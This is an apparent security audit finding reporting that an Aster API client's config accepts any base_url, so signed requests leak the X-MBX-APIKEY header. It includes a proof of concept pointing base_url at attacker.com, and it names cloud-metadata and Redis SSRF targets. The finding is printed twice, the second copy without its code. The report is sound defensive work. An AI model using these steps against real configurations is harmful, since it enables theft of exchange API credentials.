MCP-02: base_url Accepts Arbitrary URLs - SSRF via Configuration
Severity: HIGH
Affected File(s): config.py:71-88
Description
The add_account, add_account_v3, update_account, and update_account_v3 methods accept any URL as base_url without validation. No URL scheme or hostname validation is performed. The URL flows into all API requests and the X-MBX-APIKEY header is sent to whatever host is configured.
Vulnerable Code
self._config["accounts"][account_id] = {
"base_url": base_url.rstrip("/"),
...
}
Impact
If base_url is set to http://169.254.169.254 (cloud metadata), http://localhost:6379 (Redis), or an attacker-controlled server, signed requests carrying the X-MBX-APIKEY header will be sent there. API key credential theft via SSRF.
Proof of Concept
1. Configure account with base_url=http://attacker.com
2. All subsequent API calls send signed requests with API key header to attacker.com
Recommended Fix
Validate base_url against an allowlist of known Aster API hosts:
ALLOWED_HOSTS = {"fapi.asterdex.com", "sapi.asterdex.com"}
Reject non-HTTPS URLs. Apply validation in add_account, add_account_v3, update_account, update_account_v3.
Methodology: Triple-verification static analysis -- each finding verified across three independent code review passes.
MCP-02: base_url Accepts Arbitrary URLs - SSRF via Configuration
Severity: HIGH
Affected File(s):
config.py:71-88Description
The add_account, add_account_v3, update_account, and update_account_v3 methods accept any URL as base_url without validation. No URL scheme or hostname validation is performed. The URL flows into all API requests and the X-MBX-APIKEY header is sent to whatever host is configured.
Vulnerable Code
Impact
If base_url is set to http://169.254.169.254 (cloud metadata), http://localhost:6379 (Redis), or an attacker-controlled server, signed requests carrying the X-MBX-APIKEY header will be sent there. API key credential theft via SSRF.
Proof of Concept
Recommended Fix
Validate base_url against an allowlist of known Aster API hosts:
ALLOWED_HOSTS = {"fapi.asterdex.com", "sapi.asterdex.com"}
Reject non-HTTPS URLs. Apply validation in add_account, add_account_v3, update_account, update_account_v3.
Methodology: Triple-verification static analysis -- each finding verified across three independent code review passes.